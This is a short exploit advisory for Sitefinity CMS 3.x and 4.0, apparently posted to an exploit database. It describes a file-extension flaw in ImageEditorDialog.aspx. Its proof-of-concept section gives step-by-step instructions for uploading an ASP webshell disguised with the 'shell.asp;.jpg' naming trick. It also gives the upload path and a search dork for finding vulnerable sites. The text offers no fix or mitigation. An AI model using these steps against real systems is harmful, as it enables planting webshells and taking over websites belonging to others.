Sitefinity is a content management system developed using ASP.net. The ImageEditorDialog. aspx in Sitefinity CMS3.x. 4.0 has a vulnerability in processing the extension of uploaded files. Attackers may exploit this vulnerability to upload webshells.
[+] Info:
~~~~~~~~~
# Exploit Title: Sitefinity CMS (ASP. NET) Shell Upload Vulnerability
# DDate: 16/11/2010
# Author: Net. Edit0r
# Software Link: www.sitefinity.com
# Version: 3.x. 4.0
# Tested on: windows SP2 Francais V. (Pnx2 2.0)
# Dork: "Sitefinity: Login"
# Contact: Net.Edit0r@att.net ~ Black.hat.tm@gmail.com
[+] Poc:
~~~~~~~~~
Exploit #/UserControls/Dialogs/ImageEditorDialog. aspx
First go to # http://site.com/sitefinity/
Then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
Select # asp renamed via the .asp;.jpg (shell.asp;.jpg)
Upload to # http://site.com/images/mongoshell]
Video: http://net-edit0r.persiangig.com/Film/0day.rar
[+] Reference:
~~~~~~~~~
Http://www.exploit-db.com/exploits/15563